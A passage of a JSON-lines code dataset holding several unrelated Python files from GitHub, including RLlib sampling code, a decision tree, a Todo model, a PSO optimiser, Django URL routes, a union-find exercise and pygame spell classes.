policy_id, eval_data in to_eval.items():\n rnn_in = [t.rnn_state for t in eval_data]\n policy = _get_or_raise(policies, policy_id)\n # If tf (non eager) AND TFPolicy's compute_action method has not been\n # overridden -> Use `policy._build_compute_actions()`.\n if builder and (policy.compute_actions.__code__ is\n TFPolicy.compute_actions.__code__):\n\n obs_batch = [t.obs for t in eval_data]\n state_batches = _to_column_format(rnn_in)\n # TODO(ekl): how can we make info batch available to TF code?\n prev_action_batch = [t.prev_action for t in eval_data]\n prev_reward_batch = [t.prev_reward for t in eval_data]\n\n pending_fetches[policy_id] = policy._build_compute_actions(\n builder,\n obs_batch=obs_batch,\n state_batches=state_batches,\n prev_action_batch=prev_action_batch,\n prev_reward_batch=prev_reward_batch,\n timestep=policy.global_timestep)\n else:\n rnn_in_cols = [\n np.stack([row[i] for row in rnn_in])\n for i in range(len(rnn_in[0]))\n ]\n eval_results[policy_id] = policy.compute_actions(\n [t.obs for t in eval_data],\n state_batches=rnn_in_cols,\n prev_action_batch=[t.prev_action for t in eval_data],\n prev_reward_batch=[t.prev_reward for t in eval_data],\n info_batch=[t.info for t in eval_data],\n episodes=[active_episodes[t.env_id] for t in eval_data],\n timestep=policy.global_timestep)\n if builder:\n for pid, v in pending_fetches.items():\n eval_results[pid] = builder.get(v)\n\n if log_once(\"compute_actions_result\"):\n logger.info(\"Outputs of compute_actions():\\n\\n{}\\n\".format(\n summarize(eval_results)))\n\n return eval_results\n\n\ndef _process_policy_eval_results(*, to_eval, eval_results, active_episodes,\n active_envs, off_policy_actions, policies,\n clip_actions):\n \"\"\"Process the output of policy neural network evaluation.\n\n Records policy evaluation results into the given episode objects and\n returns replies to send back to agents in the env.\n\n Args:\n to_eval (Dict[str,List[PolicyEvalData]]): Mapping of policy IDs to\n lists of PolicyEvalData objects.\n eval_results (Dict[str,List]): Mapping of policy IDs to list of\n actions, rnn-out states, extra-action-fetches dicts.\n active_episodes (defaultdict[str,MultiAgentEpisode]): Mapping from\n episode ID to currently ongoing MultiAgentEpisode object.\n active_envs (Set[int]): Set of non-terminated env ids.\n off_policy_actions (dict): Doubly keyed dict of env-ids -> agent ids ->\n off-policy-action, returned by a `BaseEnv.poll()` call.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n clip_actions (bool): Whether to clip actions to the action space's\n bounds.\n\n Returns:\n actions_to_send: Nested dict of env id -> agent id -> agent replies.\n \"\"\"\n\n actions_to_send = defaultdict(dict)\n for env_id in active_envs:\n actions_to_send[env_id] = {} # at minimum send empty dict\n\n for policy_id, eval_data in to_eval.items():\n rnn_in_cols = _to_column_format([t.rnn_state for t in eval_data])\n\n actions = eval_results[policy_id][0]\n rnn_out_cols = eval_results[policy_id][1]\n pi_info_cols = eval_results[policy_id][2]\n\n # In case actions is a list (representing the 0th dim of a batch of\n # primitive actions), try to convert it first.\n if isinstance(actions, list):\n actions = np.array(actions)\n\n if len(rnn_in_cols) != len(rnn_out_cols):\n raise ValueError(\"Length of RNN in did not match RNN out, got: \"\n \"{} vs {}\".format(rnn_in_cols, rnn_out_cols))\n # Add RNN state info\n for f_i, column in enumerate(rnn_in_cols):\n pi_info_cols[\"state_in_{}\".format(f_i)] = column\n for 
f_i, column in enumerate(rnn_out_cols):\n pi_info_cols[\"state_out_{}\".format(f_i)] = column\n\n policy = _get_or_raise(policies, policy_id)\n # Split action-component batches into single action rows.\n actions = unbatch(actions)\n for i, action in enumerate(actions):\n env_id = eval_data[i].env_id\n agent_id = eval_data[i].agent_id\n # Clip if necessary.\n if clip_actions:\n clipped_action = clip_action(action,\n policy.action_space_struct)\n else:\n clipped_action = action\n actions_to_send[env_id][agent_id] = clipped_action\n episode = active_episodes[env_id]\n episode._set_rnn_state(agent_id, [c[i] for c in rnn_out_cols])\n episode._set_last_pi_info(\n agent_id, {k: v[i]\n for k, v in pi_info_cols.items()})\n if env_id in off_policy_actions and \\\n agent_id in off_policy_actions[env_id]:\n episode._set_last_action(agent_id,\n off_policy_actions[env_id][agent_id])\n else:\n episode._set_last_action(agent_id, action)\n\n return actions_to_send\n\n\ndef _fetch_atari_metrics(base_env):\n \"\"\"Atari games have multiple logical episodes, one per life.\n\n However, for metrics reporting we count full episodes, all lives included.\n \"\"\"\n unwrapped = base_env.get_unwrapped()\n if not unwrapped:\n return None\n atari_out = []\n for u in unwrapped:\n monitor = get_wrapper_by_cls(u, MonitorEnv)\n if not monitor:\n return None\n for eps_rew, eps_len in monitor.next_episode_results():\n atari_out.append(RolloutMetrics(eps_len, eps_rew))\n return atari_out\n\n\ndef _to_column_format(rnn_state_rows):\n num_cols = len(rnn_state_rows[0])\n return [[row[i] for row in rnn_state_rows] for i in range(num_cols)]\n\n\ndef _get_or_raise(mapping, policy_id):\n \"\"\"Returns a Policy object under key `policy_id` in `mapping`.\n\n Args:\n mapping (dict): The mapping dict from policy id (str) to\n actual Policy object.\n policy_id (str): The policy ID to lookup.\n\n Returns:\n Policy: The found Policy object.\n\n Throws:\n ValueError: If `policy_id` cannot be found.\n \"\"\"\n if policy_id not in mapping:\n raise ValueError(\n \"Could not find policy for agent: agent policy id `{}` not \"\n \"in policy map keys {}.\".format(policy_id, mapping.keys()))\n return mapping[policy_id]\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/rllib/evaluation/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":41280,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"9448989126","text":"# In[125]:\nimport numpy as np\nfrom FeatureImportance import *\n\nimport operator\nclass DTNode:\n '''\n Decision tree node\n '''\n def __init__(self, x, y, default_label, split_val = None, cart_cols = []):\n self.children = []\n if(len(y) != 0):\n self.label = Counter(y.reshape(1, -1).tolist()[0]).most_common(1)[0][0]\n else:\n self.label = default_label\n self.next_split_index = None\n self.split_val = split_val\n self.x = x.copy()\n self.y = y.copy()\n self.xy = np.hstack([x, y])\n self.default_label = default_label\n self.cart_cols = cart_cols\n def get_x(self):\n return self.x\n def get_y(self):\n return self.y\n def get_xy(self):\n return self.xy\n def get_children(self):\n return self.children\n def get_label(self):\n return self.label\n def get_next_split_index(self):\n return self.next_split_index\n def get_split_val(self):\n return self.split_val\n def _get_real_cols_num(self, arr):\n if(arr.shape[0] == 0):\n return 0\n else:\n return arr.shape[1]\n def _get_x_and_xval(self, calculate_method, threshold):\n '''\n Based on the chosen method and threshold, compute the information gain (ratio), select the target feature, 
and collect the distinct values taken by that feature\n '''\n res = {}\n for col_index in range(self._get_real_cols_num(self.x)):\n res[col_index] = calculate_method(self.x[:, col_index].reshape(-1, 1), self.y.reshape(-1, 1))\n if(operator.eq(res, {})):\n return None, None\n else:\n target = sorted(res, key=res.__getitem__, reverse=True)[0]\n if(res[target] < threshold):\n return None, None\n else:\n return target, np.unique(self.x[:, target])\n def _cart_get_x_and_feature(self, calculate_method, threshold, cols):\n '''\n Based on the chosen method and threshold, compute the Gini index or the mean squared error, and return the best split feature together with its best split value\n '''\n res = {}\n for col_index in cols:\n res[col_index] = calculate_method(self.x[:, col_index].reshape(-1, 1), self.y.reshape(-1, 1))\n target = sorted(res[col_index], key=res[col_index].__getitem__)[0]\n res[col_index] = (target, res[col_index][target])\n if(operator.eq(res, {})):\n return None, None\n else:\n target = sorted(res, key = lambda k: res[k][1])[0]\n if(res[target][1] < threshold):\n return None, None\n else:\n return target, res[target][0]\n \n def _build_exit(self):\n if(len(np.unique(self.y)) == 1):\n self.label = np.unique(self.y)[0]\n return True\n elif(operator.eq(self.x.tolist(), [])):\n self.label = self.default_label\n return True\n else:\n return False\n \n def _cart_build_exit(self):\n if(operator.eq(self.x.tolist(), [])):\n self.label = self.default_label\n return True\n else:\n return False\n \n def build_children(self, method, threshold):\n '''\n Check the stopping condition\n '''\n if(self._build_exit()):\n return \n '''\n Build the child nodes\n '''\n if(method == 'information gain'):\n x_index, x_val = self._get_x_and_xval(entropy_condition, threshold)\n else:\n #method == 'information gain ratio'\n x_index, x_val = self._get_x_and_xval(entropy_condition_ratio, threshold)\n '''\n No split needed;\n the label stays as the most frequent label at this node\n ?\n '''\n if(x_index == None):\n #self.label = self.default_label\n return\n self.next_split_index = x_index\n for val in x_val:\n splited_xy = self.xy[self.xy[:, x_index] == val]\n splited_xy = np.delete(splited_xy, [x_index], axis = 1)\n self.children.append(DTNode(splited_xy[:, :-1], splited_xy[:, -1].reshape(-1, 1), self.default_label, val))\n \n def cart_build_children(self, method, threshold):\n '''\n Check the stopping condition\n '''\n if(self._cart_build_exit()):\n return \n '''\n Build the child nodes\n '''\n if(method == 'gini'):\n x_index, x_val = self._cart_get_x_and_feature(gini_condition, threshold, self.cart_cols)\n if(x_index == None):\n return\n self.next_split_index = x_index\n splited_left_xy = self.xy[self.xy[:, x_index] == x_val]\n splited_right_xy = self.xy[self.xy[:, x_index] != x_val]\n next_cart_cols = self.cart_cols.copy()\n next_cart_cols.remove(x_index)\n self.children.append(DTNode(splited_left_xy[:, :-1], splited_left_xy[:, -1].reshape(-1, 1), \n self.default_label, x_val, cart_cols = next_cart_cols))\n self.children.append(DTNode(splited_right_xy[:, :-1], splited_right_xy[:, -1].reshape(-1, 1), \n self.default_label, x_val, cart_cols = next_cart_cols))\n\n\n# In[128]:\n\n\nfrom collections import Counter\nclass DecisionTree:\n '''\n Decision tree\n '''\n def __init__(self, method, threshold):\n self.x = None\n self.y = None\n self.root = None\n self.threshold = threshold\n self.default_label = None\n self.method = method\n if(method == 'ID3'):\n self.feature_selection_method = \"information gain\"\n elif(method == 'cart clf'):\n self.feature_selection_method = \"gini\"\n else:\n #method == 'C4.5'\n self.feature_selection_method = \"information gain ratio\"\n def fit(self, x, y):\n self.x = x\n self.y = y\n '''\n Pick the default label, i.e. the most frequent label in the training set\n '''\n self.default_label = 
Counter(self.y.reshape(1, -1).tolist()[0]).most_common(1)[0][0]\n        '''\n        Build the decision tree with a breadth-first traversal\n        '''\n        self.root = DTNode(x, y, self.default_label, cart_cols = list(range(self.x.shape[1])))\n        queue = [self.root]\n        while(len(queue) > 0):\n            node = queue.pop(0)\n            if('information' in self.feature_selection_method):\n                node.build_children(self.feature_selection_method, self.threshold)\n            else:\n                node.cart_build_children(self.feature_selection_method, self.threshold)\n            queue += node.get_children()\n    def show(self):\n        '''\n        Display each node's information\n        '''\n        queue = [self.root]\n        while(len(queue) > 0):\n            node = queue.pop(0)\n            print('==============')\n            print('node label:', node.get_label())\n            print('node split_val', node.get_split_val())\n            print('node next_split_index:', node.get_next_split_index())\n            print('xy:')\n            print(node.get_xy())\n            queue += node.get_children()\n    \n\n\n# In[129]:\n\n\nxy = np.array([[0,0,0,0,0,1,1,1,1,1,2,2,2,2,2], [0,0,1,1,0,0,0,1,0,0,0,0,1,1,0], [0,0,0,1,0,0,0,1,1,1,1,1,0,0,0], \n               [0,1,1,0,0,0,1,1,2,2,2,1,1,2,0], [0,0,1,1,0,0,0,1,1,1,1,1,1,1,0]]).T\ndt = DecisionTree(method = 'cart clf', threshold = 0.01)\ndt.fit(xy[:, :-1], xy[:, -1].reshape(-1, 1))\ndt.show()\n\n\n# In[130]:\n\n\nxy = np.array([[0,0,0,0,0,1,1,1,1,1,2,2,2,2,2], [0,0,1,1,0,0,0,1,0,0,0,0,1,1,0], [0,0,0,1,0,0,0,1,1,1,1,1,0,0,0], \n               [0,1,1,0,0,0,1,1,2,2,2,1,1,2,0], [0,0,1,1,0,0,0,1,1,1,1,1,1,1,0]]).T\ndt = DecisionTree(method = 'ID3', threshold = 0.1)\ndt.fit(xy[:, :-1], xy[:, -1].reshape(-1, 1))\ndt.show()\n\n","repo_name":"Wchenguang/gglearn","sub_path":"DecisionTree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
+{"seq_id":"24279709478","text":"import datetime\nimport json\n\nfrom itsdangerous import (TimedJSONWebSignatureSerializer as Serializer,\n                          BadSignature, SignatureExpired)\nfrom peewee import *\n\nimport config\nimport mock\n\nDATABASE = SqliteDatabase('todo.sqlite')\n\nclass Todo(Model):\n    name = CharField()\n    completed = BooleanField()\n    edited = BooleanField()\n\n    class Meta:\n        database = DATABASE\n\n    @classmethod\n    def write_new_todo(cls, name, completed=False, edited=False):\n        try:\n            with DATABASE.transaction():\n                return cls.create(name=name,\n                                  completed=completed,\n                                  edited=edited)\n        except IntegrityError:\n            raise ValueError(\"Entry already exists\")\n\n    @classmethod\n    def update_todo(cls, todo_id, name, completed, edited, **kwargs):\n        if kwargs:\n            try:\n                todo_id = kwargs.pop('todo_id', None)\n                exe = Todo.update(**kwargs).where((Todo.id==todo_id)).execute()\n                return exe\n            except (DataError, Exception) as e:\n                print(e)\n        else:\n            try:\n                todo = cls.get_specific_todo(todo_id)\n                todo.name = name\n                todo.completed = completed\n                todo.edited = edited\n                todo.save()\n                return todo\n            except (DataError, Exception) as e:\n                print(e)\n\n    @classmethod\n    def get_all_todos(cls):\n        return cls.select()\n\n    @classmethod\n    def get_specific_todo(cls, todo_id):\n        return cls.select().where(Todo.id == todo_id).get()\n\n\ndef initialize():\n    DATABASE.connect(reuse_if_open=True)\n    DATABASE.create_tables([Todo], safe=True)\n    with DATABASE.atomic():\n        with open('mock/todos.json', 'r') as initial_data:\n            for data_dict in json.loads(initial_data.read()):\n                if not Todo.select().where(Todo.name==data_dict['name']):\n                    data_dict['completed'] = False\n                    data_dict['edited'] = False\n                    Todo.create(**data_dict)\n    
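    # A minimal usage sketch of the Todo model above (the literal values and the
    # `todo.id` lookup are illustrative only, not part of the original module):
    #
    #   todo = Todo.write_new_todo("buy milk")
    #   Todo.update_todo(todo.id, "buy oat milk", False, True)  # todo_id, name, completed, edited
    #   names = [t.name for t in Todo.get_all_todos()]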
DATABASE.close()\n","repo_name":"fkirwin/todoapi","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71048553068","text":"# Landscape using fractals\r\n# Student: Oaxaca Pérez David Arturo\r\n# Course: Evolutionary Computing\r\n# Professor: Dr. Jorge Luis Rosas Trigueros\r\n# Lab Session 06: Particle Swarm Optimization\r\n# Based on the code by Dr. Jorge Luis Rosas Trigueros seen in class\r\n# Group: 3CV11\r\n# Date: 15/10/2021\r\n\r\n#Original File: pso_wikipedia.ipynb\r\n#Example of PSO based on the wikipedia entry\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nlower_limit=-5\r\nupper_limit=5\r\n\r\nn_particles=10\r\nn_dimensions=2\r\n\r\n# Function to be evaluated by the algorithm\r\ndef ackley_function(x, y):\r\n    return -20.0 * np.exp(-0.2 * np.sqrt(0.5 * (x**2 + y**2))) - \\\r\n        np.exp(0.5 * (np.cos(2 * np.pi * x)+np.cos(2 * np.pi * y))) + np.e + 20 \r\n\r\n\r\n# Initialize the particle positions and their velocities\r\n#Bias the initial population\r\nX = lower_limit + 0.25*(upper_limit - lower_limit) * np.random.rand(n_particles, n_dimensions) \r\nassert X.shape == (n_particles, n_dimensions)\r\n# V = np.zeros(X.shape)\r\nV = -(upper_limit - lower_limit) + 2*(upper_limit - lower_limit)*np.random.rand(n_particles, n_dimensions)\r\n \r\n# Initialize the global and local fitness to the worst possible\r\nfitness_gbest = np.inf\r\nfitness_lbest = fitness_gbest * np.ones(n_particles)\r\n\r\nX_lbest = 1*X\r\nX_gbest = 1*X_lbest[0]\r\n\r\nfitness_X = np.zeros(X.shape)\r\n\r\nfor i in range(0, n_particles):\r\n    if ackley_function(X_lbest[i][0], X_lbest[i][1]) < ackley_function(X_gbest[0], X_gbest[1]):\r\n        X_gbest = 1*X_lbest[i]\r\n\r\n\r\ncount=0\r\n\r\ndef iteration():\r\n    global count\r\n    global X,X_lbest,X_gbest,V\r\n\r\n    # Loop until convergence, in this example a finite number of iterations chosen\r\n    weight=0.7 # Inertia\r\n    C1=0.2 # Personal history (cognitive coefficient)\r\n\r\n    C2=0.1 # Follow the trend set by the leader (social coefficient)\r\n\r\n    count+=1\r\n\r\n    if count%100 == 0:\r\n        print (f\"Generation {count}: Best particle in: {X_gbest} \\ngbest: {ackley_function(X_gbest[0], X_gbest[1])}\\n\")\r\n\r\n    # Update the particle velocity and position\r\n    for I in range(0, n_particles):\r\n        for J in range(0, n_dimensions):\r\n            R1 = np.random.rand()#uniform_random_number()\r\n            R2 = np.random.rand()#uniform_random_number()\r\n            V[I][J] = (weight*V[I][J]\r\n                       + C1*R1*(X_lbest[I][J] - X[I][J]) \r\n                       + C2*R2*(X_gbest[J] - X[I][J]))\r\n            X[I][J] = X[I][J] + V[I][J]\r\n            if ackley_function(X[I][0], X[I][1]) < ackley_function(X_lbest[I][0], X_lbest[I][1]):\r\n                X_lbest[I]=1*X[I]\r\n            if ackley_function(X_lbest[I][0], X_lbest[I][1]) < ackley_function(X_gbest[0], X_gbest[1]):\r\n                X_gbest=1*X_lbest[I]\r\n    \r\n\r\n\r\nfor i in range(2500):\r\n    iteration()\r\n","repo_name":"david-oaxaca/Evolutionary-Computing","sub_path":"Lab Session 06 - Particle Swarm Optimization/Code/Ackley_PSO_Lab_Session06.py","file_name":"Ackley_PSO_Lab_Session06.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"38393251845","text":"\"\"\"silumz URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. 
Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom images import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^article/(?P\\d+)/$', views.page, name='article'),\n url(r'^tag/(?P\\d+)/$', views.tag, name='tag'),\n url(r'^type/(?P\\d+)/$', views.type, name='type'),\n url(r'^search/', views.search),\n url(r'^get_video/', views.getVideo),\n url(r'^video/', views.pVideo),\n url(r'^mvideo/', views.mVideo),\n url(r'^tag/', views.HotTag),\n url(r'^sort/(?P\\w+)/$', views.SortBy, name='sort'),\n]\n","repo_name":"hijkpw/94imm","sub_path":"silumz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"37"} +{"seq_id":"5963319315","text":"__author__ = 'dong.qu'\n\n\nclass UF():\n \"\"\"\n quick union\n \"\"\"\n def __init__(self, N):\n self.N = N\n self.parent_val = list(range(N))\n\n def find_root(self, p_idx):\n while p_idx != self.parent_val[p_idx]:\n p_idx = self.parent_val[p_idx]\n return p_idx\n\n def union(self, p, q):\n p_rt = self.find_root(p)\n q_rt = self.find_root(q)\n if p_rt == q_rt:\n pass\n else:\n self.parent_val[q] = p_rt\n self.N -= 1\n\n def connected(self, p, q):\n return self.find_root(p) == self.find_root(q)\n\n def count(self):\n return self.N\n\nuf = UF(6)\nuf.union(3,4)\nprint(uf.parent_val)\nuf.union(4,5)\nuf.union(1,3)\nuf.union(1,4)\nprint(uf.parent_val)\nprint(uf.connected(1,5))\n","repo_name":"qd452/Algorithm4","sub_path":"PyAlgo4/src/uf_review.py","file_name":"uf_review.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"24814368563","text":"def solution(n, costs):\n ans = 0\n costs.sort(key=lambda x:x[2])\n data = set([costs[0][0]])\n \n while len(data)!=n:\n for cost in costs:\n if cost[0] in data and cost[1] in data:\n continue\n if cost[0] in data or cost[1] in data:\n data.update([cost[0],cost[1]])\n ans+=cost[2]\n break\n\n return ans\n","repo_name":"JiIJu/algorithm_algorithm","sub_path":"학사 지이주/2023/3월/0322/섬 연결하기.py","file_name":"섬 연결하기.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71875484907","text":"import pygame, math, random\nfrom pygame.locals import *\n\ndef ground_at(LEVEL, x, f=False):\n \"\"\"Finds the y co-ordinate of the ground at position x.\"\"\"\n ysense = 479\n sensing = True\n while sensing:\n sensetile = LEVEL.map[x//40][ysense//40]\n if not sensetile or \"NONE\" in sensetile.collidetype: break\n if sensetile.collidetype == \"RIGHT_INCLINATION\":\n if x%40 < 40-(ysense%40):\n break\n elif sensetile.collidetype == \"RIGHT_HINCLINATION1\":\n if x%40 < 2*(40-(ysense%40)):\n break\n elif sensetile.collidetype == \"RIGHT_HINCLINATION2\":\n if (x%40)+40 < 2*(40-(ysense%40)):\n break\n elif sensetile.collidetype == \"LEFT_INCLINATION\":\n if x%40 > ysense%40:\n break\n elif sensetile.collidetype == \"LEFT_HINCLINATION1\":\n if x%40 + 40 > 2*(ysense%40):\n break\n elif sensetile.collidetype == \"LEFT_HINCLINATION2\":\n 
if (x%40) > 2*(ysense%40):\n break\n ysense -= [1,10][f]\n if ysense <= 0: return 479\n return ysense\n\ndef m_init_data(data):\n global DATA\n DATA = data\n\nclass Spell: # Spell is a class that (basically) all spells are based on\n def __init__(self, caster, x, y):\n self.cost = 0\n self.x = x\n self.y = y\n self.caster = caster\n self.a_step = 0\n self.ticker = 0\n self.LEVELSTATE = None\n self.MONSTERSTATE = None\n self.RAIN_H = False\n self.finished = False\n\n self.SOUND = \"\"\n self.fvm = None # Faceview monster\n self.fvd = 0 # faceview damage\n\n self.s_init()\n\n def s_init(self):\n pass\n\n def blit(self, surf, ALT_X = 0, ALT_Y = 0):\n if not self.finished: self.s_blit(surf, ALT_X, ALT_Y)\n\n def tick(self, LEVEL, MONSTERS, CASTER, RAIN = False):\n if self.finished: return\n self.RAIN_H = RAIN\n self.LEVELSTATE = LEVEL\n self.MONSTERSTATE = MONSTERS\n self.ticker += 1\n self.caster = CASTER\n self.stick()\n\nclass Fire_1(Spell):\n def s_init(self):\n self.cost = 4\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.frames = [\"m_fire1_\" + str(x) + \".png\" for x in range(1,6)]\n self.flame_entities = []\n self.caster.mbreaktime = 16\n self.caster.mp[0] -= self.cost\n self.mydir = self.caster.direction * 2 - 1\n self.unchdir = self.caster.direction\n self.x += self.mydir * 10\n self.rise = 0\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n c = 0\n for flame in self.flame_entities:\n if flame == -40: continue\n gimg, grect = DATA.mag_images[\"m_fire1_glow.png\"]\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*8, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n rect.move_ip(ALT_X, ALT_Y)\n grect.midbottom = (self.x + flame*8, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n grect.move_ip(ALT_X, ALT_Y+3)\n surf.blit(img, rect)\n surf.blit(gimg, grect)\n c += 1\n\n def stick(self):\n\n self.y = self.caster.y - 25\n self.x = self.caster.x\n self.caster.jumping = False\n if len(self.flame_entities) < 8:\n self.caster.direction = self.unchdir\n\n if not self.ticker % 2:\n if len(self.flame_entities) < 8:\n self.flame_entities = [0] + self.flame_entities\n\n self.flame_entities = [[x + self.mydir,-40][[x<-35 or x>0,x>35 or x<0][self.unchdir]] for x in self.flame_entities]\n\n\n if self.caster.up_held: self.rise -= 0.05\n if self.caster.down_held: self.rise += 0.05\n\n # Collision detections\n\n c = 0\n for flame in self.flame_entities:\n\n if flame == -40: continue\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*8, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n\n if self.check_collide(rect):\n self.flame_entities[c] = -40\n\n c += 1\n\n if sum(self.flame_entities) == 8 * -40:\n self.finished = True\n\n def check_collide(self, crect):\n for monster in self.MONSTERSTATE:\n monsterrect = pygame.rect.Rect((0,0,monster.collision_dist*2,monster.collision_hdist*2))\n monsterrect.center = monster.x, monster.y\n if crect.colliderect(monsterrect):\n damage = (self.caster.magic[0] * 3)/15.0\n self.caster.combodamage += min(damage, monster.hp)\n monster.react_to_magic(damage)\n self.fvm = monster\n self.fvd = damage\n self.caster.combo += 1\n return True\n return False\n\nclass Summon(Spell):\n def s_init(self):\n self.caster.mbreaktime = 20\n self.rays = []\n self.alphamod = 0.0\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n alphamult = self.alphamod 
/ 100.0\n if alphamult > 0:\n for width, phase, magnitude in self.rays:\n rayrect = Rect(0, 0, width, 480)\n variance = math.sin(phase) * magnitude\n rayrect.midbottom = self.caster.x + variance, self.caster.y\n raysurf = pygame.Surface(rayrect.size)\n colour = (int(20 + magnitude * 2.5), 50 + width * 3, int(220 - phase * 10))\n raysurf.fill(colour)\n relalpha = max(0, min(255, 255 - (abs(variance)) * (255/100.0))) * 0.3\n raysurf.set_alpha(alphamult * relalpha)\n surf.blit(raysurf, rayrect.move(ALT_X, ALT_Y))\n\n def stick(self):\n ri = random.randint\n if self.alphamod and self.caster.mbreaktime:\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n\n\n if self.ticker < 25:\n # Creation of rays phase\n if not self.ticker % 3:\n self.rays.append([ri(5,35), ri(-30,30)/10.0, ri(5, 30)]) # Width, phase, magntd\n\n self.alphamod = min(self.alphamod + 7.5, 100)\n\n if self.ticker > 25:\n self.alphamod -= 10\n if self.alphamod < 0: self.alphamod = 0; self.finished = True\n\n for r in range(len(self.rays)):\n ray = self.rays[r]\n self.rays[r][1] += ray[2]/300.0\n\nclass Burst(Spell):\n def s_init(self):\n global DATA\n self.caster.mbreaktime = 30\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n self.mticker = -abs(self.ticker-15)+15\n pic = DATA.mag_images[\"Burst.png\"][0]\n msurf = pygame.transform.scale(pic, (max(5, min(185, self.mticker**3))+15, max(5, min(185, self.mticker**3))+15))\n msurf = pygame.transform.rotate(msurf, self.ticker**1.8)\n rect = msurf.get_rect()\n rect.center = (self.x + ALT_X, self.y + ALT_Y)\n surf.blit(msurf, rect)\n if self.ticker >= 30:\n self.finished = True\n def stick(self):\n self.x, self.y = self.caster.x, self.caster.y - 40\n if self.ticker%3: return\n for monster in self.MONSTERSTATE:\n dist = abs(monster.x - self.x) + abs(monster.y - self.y)\n if dist > 110:\n continue\n monster.react_to_magic(0)\n\nclass Ice_1(Spell):\n def s_init(self):\n global DATA\n self.affected = []\n self.cant = self.caster.mp[0] < 4\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n if not self.affected:\n if self.ticker >= 0: self.finished = True\n return\n self.mticker = -abs(self.ticker-15)+15\n msurf = pygame.transform.scale(DATA.mag_images[\"ice.png\"][0], (max(5, min(125, self.mticker**2))+15, max(5, min(125, self.mticker**2))+15))\n msurf = pygame.transform.rotate(msurf, self.ticker**1.7)\n rect = msurf.get_rect()\n for mon in self.affected:\n rect.center = (mon.x + ALT_X, mon.y-40 + ALT_Y)\n surf.blit(msurf, rect)\n if self.ticker == 10:\n dmg = int(random.randint(80,120)/100.0 * self.caster.magic[0] * 0.6)\n self.caster.combodamage += min(dmg, mon.hp)\n mon.react_to_magic(dmg)\n self.fvm = mon\n self.fvd = dmg\n self.caster.combo += 1\n\n if self.ticker >= 30:\n self.finished = True\n\n def stick(self):\n if self.affected == []:\n for monster in self.MONSTERSTATE:\n xdist = abs(monster.x-self.caster.x)\n if xdist < 300 and not monster.isdead:\n if self.caster.mp[0] >= 4:\n self.affected.append(monster)\n self.caster.mp[0] -= 4\n if len(self.affected):\n self.SOUND = \"Ice.ogg\"\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n self.caster.frame = 0\n self.caster.tframe = 0\n self.caster.casting = True\n self.caster.mbreaktime = 30\n\nclass Ice_2(Ice_1):\n def s_init(self):\n global DATA\n self.affected = []\n self.cant = self.caster.mp[0] < 8\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n if not self.affected:\n if self.ticker >= 0: self.finished = True\n return\n self.mticker = 
-abs(self.ticker-15)+15\n msurf = pygame.transform.scale(DATA.mag_images[\"ice2.png\"][0], (max(5, min(125, self.mticker**2))+15, max(5, min(125, self.mticker**2))+15))\n msurf = pygame.transform.rotate(msurf, self.ticker**1.7)\n rect = msurf.get_rect()\n for mon in self.affected:\n rect.center = (mon.x + ALT_X, mon.y-40 + ALT_Y)\n surf.blit(msurf, rect)\n if self.ticker == 10:\n dmg = int(random.randint(80,120)/100.0 * self.caster.magic[0] * 1.1)\n self.caster.combodamage += min(dmg, mon.hp)\n mon.react_to_magic(dmg)\n self.fvm = mon\n self.fvd = dmg\n self.caster.combo += 1\n\n\n if self.ticker >= 30:\n self.finished = True\n\n def stick(self):\n if self.affected == []:\n for monster in self.MONSTERSTATE:\n xdist = abs(monster.x-self.caster.x)\n if xdist < 300 and not monster.isdead:\n if self.caster.mp[0] >= 8:\n self.affected.append(monster)\n self.caster.mp[0] -= 8\n if len(self.affected):\n self.SOUND = \"Ice.ogg\"\n self.caster.animation = \"Stopped\"\n 